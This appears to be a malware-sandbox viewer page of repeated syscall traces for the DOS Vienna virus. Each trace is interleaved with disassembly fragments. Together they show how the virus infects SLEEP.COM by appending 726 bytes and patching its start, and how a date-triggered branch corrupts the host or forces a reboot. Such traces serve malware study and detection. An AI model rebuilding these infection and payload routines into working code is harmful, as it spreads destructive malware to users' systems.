Sample viewer

vx.netlux.org/Virus.DOS.Vienna.726

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:38:25.721741252Z 47 PC: 12e23 | Get disk transfer address
2018-12-17T22:38:25.724248318Z 26 PC: 12e32 | Set disk transfer address
2018-12-17T22:38:25.725669652Z 78 PC: 12eb0 | Find first file
2018-12-17T22:38:25.730300807Z 67 PC: 12eeb | Get or set file attributes
2018-12-17T22:38:25.73431541Z 67 PC: 12efc | Get or set file attributes
2018-12-17T22:38:26.731080405Z 61 PC: 12f06 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:38:26.738586205Z 87 PC: 12f12 | Get or set file date and time
2018-12-17T22:38:26.740137717Z 42 PC: 12f1c | Get date 0x12f1c: cmp cx, 0x7c5
0x12f20: ja 0x12f27
0x12f22: cmp dh, 9
0x12f25: jbe 0x12f57
0x12f27: mov ah, 0x2c
0x12f29: int 0x21
0x12f2b: and dh, 7
0x12f2e: jne 0x12f40
0x12f30: mov ah, 0x40
0x12f32: mov cx, 5
0x12f35: mov dx, si
0x12f37: add dx, 0xda
0x12f3b: int 0x21
0x12f3d: jmp 0x12fe7
0x12f40: and dh, 9
0x12f43: jne 0x12f57
0x12f45: xor ax, ax
0x12f47: mov ds, ax
0x12f49: and word ptr [0x410], 0xff3f
0x12f4f: mov word ptr [0x413], 0x100
2018-12-17T22:38:26.742745689Z 44 PC: 12f2b | Get time 0x12f2b: and dh, 7
0x12f2e: jne 0x12f40
0x12f30: mov ah, 0x40
0x12f32: mov cx, 5
0x12f35: mov dx, si
0x12f37: add dx, 0xda
0x12f3b: int 0x21
0x12f3d: jmp 0x12fe7
0x12f40: and dh, 9
0x12f43: jne 0x12f57
0x12f45: xor ax, ax
0x12f47: mov ds, ax
0x12f49: and word ptr [0x410], 0xff3f
0x12f4f: mov word ptr [0x413], 0x100
0x12f55: int 0x19
0x12f57: mov word ptr [si + 0x10], 0
0x12f5c: lea di, word ptr [si + 0x5f]
0x12f5f: mov cx, 0x2b
0x12f62: xor al, al
0x12f64: rep stosb byte ptr es:[di], al
2018-12-17T22:38:26.74552209Z 63 PC: 12f72 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:38:26.752868415Z 66 PC: 12f84 | Move file pointer
2018-12-17T22:38:26.755625318Z 64 PC: 12fa7 | Write file or device (Write 726 bytes on handle 5)
2018-12-17T22:38:26.765688356Z 66 PC: 12fb9 | Move file pointer
2018-12-17T22:38:26.768093912Z 64 PC: 12fc7 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:38:26.776885736Z 87 PC: 12fd6 | Get or set file date and time
2018-12-17T22:38:26.778776921Z 62 PC: 12fda | Close file
2018-12-17T22:38:26.787928852Z 67 PC: 12fe7 | Get or set file attributes
2018-12-17T22:38:26.799075903Z 26 PC: 12ff2 | Set disk transfer address
2018-12-17T22:38:26.800566571Z 9 PC: 12caf | Display string (String= '���D')
2018-12-17T22:38:26.805204572Z 9 PC: 12cb6 | Display string (String= '����t�H^���z���� ��������;')
2018-12-17T22:38:26.822372195Z 76 PC: 12c19 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6573,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:53.944893425Z 47 PC: 12e23 | Get disk transfer address
2018-12-25T11:59:53.946717376Z 26 PC: 12e32 | Set disk transfer address
2018-12-25T11:59:53.948802944Z 78 PC: 12eb0 | Find first file
2018-12-25T11:59:53.955376295Z 67 PC: 12eeb | Get or set file attributes
2018-12-25T11:59:53.962124499Z 67 PC: 12efc | Get or set file attributes
2018-12-25T11:59:54.876172399Z 61 PC: 12f06 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:54.890275659Z 87 PC: 12f12 | Get or set file date and time
2018-12-25T11:59:54.892591705Z 42 PC: 12f1c | Get date 0x12f1c: cmp cx, 0x7c5
0x12f20: ja 0x12f27
0x12f22: cmp dh, 9
0x12f25: jbe 0x12f57
0x12f27: mov ah, 0x2c
0x12f29: int 0x21
0x12f2b: and dh, 7
0x12f2e: jne 0x12f40
0x12f30: mov ah, 0x40
0x12f32: mov cx, 5
0x12f35: mov dx, si
0x12f37: add dx, 0xda
0x12f3b: int 0x21
0x12f3d: jmp 0x12fe7
0x12f40: and dh, 9
0x12f43: jne 0x12f57
0x12f45: xor ax, ax
0x12f47: mov ds, ax
0x12f49: and word ptr [0x410], 0xff3f
0x12f4f: mov word ptr [0x413], 0x100
2018-12-25T11:59:54.899111245Z 63 PC: 12f72 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:59:54.908687319Z 66 PC: 12f84 | Move file pointer
2018-12-25T11:59:54.913585936Z 64 PC: 12fa7 | Write file or device (Write 726 bytes on handle 5)
2018-12-25T11:59:54.928779925Z 66 PC: 12fb9 | Move file pointer
2018-12-25T11:59:54.933865552Z 64 PC: 12fc7 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:54.955562556Z 87 PC: 12fd6 | Get or set file date and time
2018-12-25T11:59:54.958442953Z 62 PC: 12fda | Close file
2018-12-25T11:59:54.967266031Z 67 PC: 12fe7 | Get or set file attributes
2018-12-25T11:59:54.978551313Z 26 PC: 12ff2 | Set disk transfer address
2018-12-25T11:59:54.982571635Z 9 PC: 12caf | Display string (String= '���D')
2018-12-25T11:59:54.989148864Z 9 PC: 12cb6 | Display string (String= '����t�H^���z���� ��������;')
2018-12-25T11:59:55.007110954Z 76 PC: 12c19 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6573,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:54.282803863Z 47 PC: 12e23 | Get disk transfer address
2018-12-25T11:59:54.285075891Z 26 PC: 12e32 | Set disk transfer address
2018-12-25T11:59:54.286575752Z 78 PC: 12eb0 | Find first file
2018-12-25T11:59:54.293111714Z 67 PC: 12eeb | Get or set file attributes
2018-12-25T11:59:54.299977821Z 67 PC: 12efc | Get or set file attributes
2018-12-25T11:59:54.317555879Z 61 PC: 12f06 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:54.324686109Z 87 PC: 12f12 | Get or set file date and time
2018-12-25T11:59:54.326900582Z 42 PC: 12f1c | Get date 0x12f1c: cmp cx, 0x7c5
0x12f20: ja 0x12f27
0x12f22: cmp dh, 9
0x12f25: jbe 0x12f57
0x12f27: mov ah, 0x2c
0x12f29: int 0x21
0x12f2b: and dh, 7
0x12f2e: jne 0x12f40
0x12f30: mov ah, 0x40
0x12f32: mov cx, 5
0x12f35: mov dx, si
0x12f37: add dx, 0xda
0x12f3b: int 0x21
0x12f3d: jmp 0x12fe7
0x12f40: and dh, 9
0x12f43: jne 0x12f57
0x12f45: xor ax, ax
0x12f47: mov ds, ax
0x12f49: and word ptr [0x410], 0xff3f
0x12f4f: mov word ptr [0x413], 0x100
2018-12-25T11:59:54.329128969Z 63 PC: 12f72 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:59:54.335367217Z 66 PC: 12f84 | Move file pointer
2018-12-25T11:59:54.33697751Z 64 PC: 12fa7 | Write file or device (Write 726 bytes on handle 5)
2018-12-25T11:59:54.345745341Z 66 PC: 12fb9 | Move file pointer
2018-12-25T11:59:54.347236609Z 64 PC: 12fc7 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:54.353619867Z 87 PC: 12fd6 | Get or set file date and time
2018-12-25T11:59:54.355824659Z 62 PC: 12fda | Close file
2018-12-25T11:59:54.363822586Z 67 PC: 12fe7 | Get or set file attributes
2018-12-25T11:59:54.373551121Z 26 PC: 12ff2 | Set disk transfer address
2018-12-25T11:59:54.375570403Z 9 PC: 12caf | Display string (String= '���D')
2018-12-25T11:59:54.380916619Z 9 PC: 12cb6 | Display string (String= '����t�H^���z���� ��������;')
2018-12-25T11:59:54.3960216Z 76 PC: 12c19 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":7,"TimeBased":true,"OriginalID":6573,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:54.480291058Z 47 PC: 12e23 | Get disk transfer address
2018-12-25T11:59:54.482606565Z 26 PC: 12e32 | Set disk transfer address
2018-12-25T11:59:54.484970059Z 78 PC: 12eb0 | Find first file
2018-12-25T11:59:54.492736185Z 67 PC: 12eeb | Get or set file attributes
2018-12-25T11:59:54.499104486Z 67 PC: 12efc | Get or set file attributes
2018-12-25T11:59:54.875805587Z 61 PC: 12f06 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:54.890843655Z 87 PC: 12f12 | Get or set file date and time
2018-12-25T11:59:54.892774757Z 42 PC: 12f1c | Get date 0x12f1c: cmp cx, 0x7c5
0x12f20: ja 0x12f27
0x12f22: cmp dh, 9
0x12f25: jbe 0x12f57
0x12f27: mov ah, 0x2c
0x12f29: int 0x21
0x12f2b: and dh, 7
0x12f2e: jne 0x12f40
0x12f30: mov ah, 0x40
0x12f32: mov cx, 5
0x12f35: mov dx, si
0x12f37: add dx, 0xda
0x12f3b: int 0x21
0x12f3d: jmp 0x12fe7
0x12f40: and dh, 9
0x12f43: jne 0x12f57
0x12f45: xor ax, ax
0x12f47: mov ds, ax
0x12f49: and word ptr [0x410], 0xff3f
0x12f4f: mov word ptr [0x413], 0x100
2018-12-25T11:59:54.897131556Z 63 PC: 12f72 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:59:54.904766045Z 66 PC: 12f84 | Move file pointer
2018-12-25T11:59:54.906770535Z 64 PC: 12fa7 | Write file or device (Write 726 bytes on handle 5)
2018-12-25T11:59:54.917718895Z 66 PC: 12fb9 | Move file pointer
2018-12-25T11:59:54.919700311Z 64 PC: 12fc7 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:54.927428214Z 87 PC: 12fd6 | Get or set file date and time
2018-12-25T11:59:54.930294195Z 62 PC: 12fda | Close file
2018-12-25T11:59:54.939116092Z 67 PC: 12fe7 | Get or set file attributes
2018-12-25T11:59:54.950387531Z 26 PC: 12ff2 | Set disk transfer address
2018-12-25T11:59:54.952219687Z 9 PC: 12caf | Display string (String= '���D')
2018-12-25T11:59:54.959818337Z 9 PC: 12cb6 | Display string (String= '����t�H^���z���� ��������;')
2018-12-25T11:59:54.977050166Z 76 PC: 12c19 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":7,"TimeBased":true,"OriginalID":6573,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:54.566887122Z 26 PC: 12a83 | Set disk transfer address
2018-12-25T11:59:54.569028957Z 78 PC: 12a8e | Find first file
2018-12-25T11:59:54.57555098Z 67 PC: 12a9c | Get or set file attributes
2018-12-25T11:59:54.581177185Z 67 PC: 12aac | Get or set file attributes
2018-12-25T11:59:54.606964726Z 61 PC: 12abd | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:54.614360693Z 63 PC: 12ad7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:59:54.622231785Z 66 PC: 12b1e | Move file pointer
2018-12-25T11:59:54.623812575Z 64 PC: 12b29 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:54.631275972Z 66 PC: 12b32 | Move file pointer
2018-12-25T11:59:54.632597154Z 64 PC: 12b3d | Write file or device (Write 721 bytes on handle 5)
2018-12-25T11:59:54.641127313Z 87 PC: 12b4a | Get or set file date and time
2018-12-25T11:59:54.646731976Z 62 PC: 12b4e | Close file
2018-12-25T11:59:54.654215539Z 67 PC: 12b5d | Get or set file attributes
2018-12-25T11:59:54.664289091Z 42 PC: 12b61 | Get date 0x12b61: cmp dl, 1
0x12b64: jne 0x12b8e
0x12b66: mov cx, 0x131
0x12b69: lea di, word ptr [bp + 0x2a9]
0x12b6d: xor ax, ax
0x12b6f: mov ah, byte ptr [bp + 0x3db]
0x12b73: inc di
0x12b74: mov al, byte ptr [di]
0x12b76: xor al, ah
0x12b78: mov byte ptr [di], al
0x12b7a: loop 0x12b73
0x12b7c: mov ah, 9
0x12b7e: lea dx, word ptr [bp + 0x2aa]
0x12b82: int 0x21
0x12b84: lea dx, word ptr [bp + 0x3bc]
0x12b88: int 0x21
0x12b8a: mov ah, 8
0x12b8c: int 0x21
0x12b8e: cmp word ptr [0x100], 0x1f0e
0x12b94: jne 0x12b9a
2018-12-25T11:59:54.66784124Z 9 PC: 12b84 | Display string (Could not find end pointer)
2018-12-25T11:59:54.684384111Z 9 PC: 12b8a | Display string (String= ' Punch a key to continue... ')
2018-12-25T11:59:54.69077674Z 8 PC: 12b8e | Console input without echo